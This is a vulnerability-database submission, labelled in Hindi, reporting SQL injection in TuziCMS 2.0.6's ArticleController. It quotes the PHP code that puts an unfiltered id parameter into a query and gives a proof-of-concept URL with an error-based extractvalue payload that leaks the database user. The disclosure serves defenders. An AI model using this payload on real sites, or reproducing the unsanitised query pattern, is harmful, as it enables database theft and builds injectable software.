| शीर्षक | tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject |
|---|
| विवरण | hello, i am a newcomer. First submission vulnerability.
A vulnerability classified as serious was found.
The article module does not filter the id parameter.
Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards.
code:
\App\Manage\Controller\ArticleController.class.php
line: 18 - 22
public function index(){
C('TOKEN_ON',false);//关闭表单令牌
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();
// dump($topcate);
// exit;
POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
|
|---|
| स्रोत | ⚠️ https://github.com/yeyinshi/tuzicms/issues/12 |
|---|
| उपयोगकर्ता | Evilmu1 (UID 38763) |
|---|
| सबमिशन | 12/01/2023 04:47 AM (3 साल पहले) |
|---|
| संयम | 12/01/2023 03:46 PM (11 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 218151 [TuziCMS 2.0.6 Article ArticleController.class.php index पहचान SQL इंजेक्शन] |
|---|
| अंक | 20 |
|---|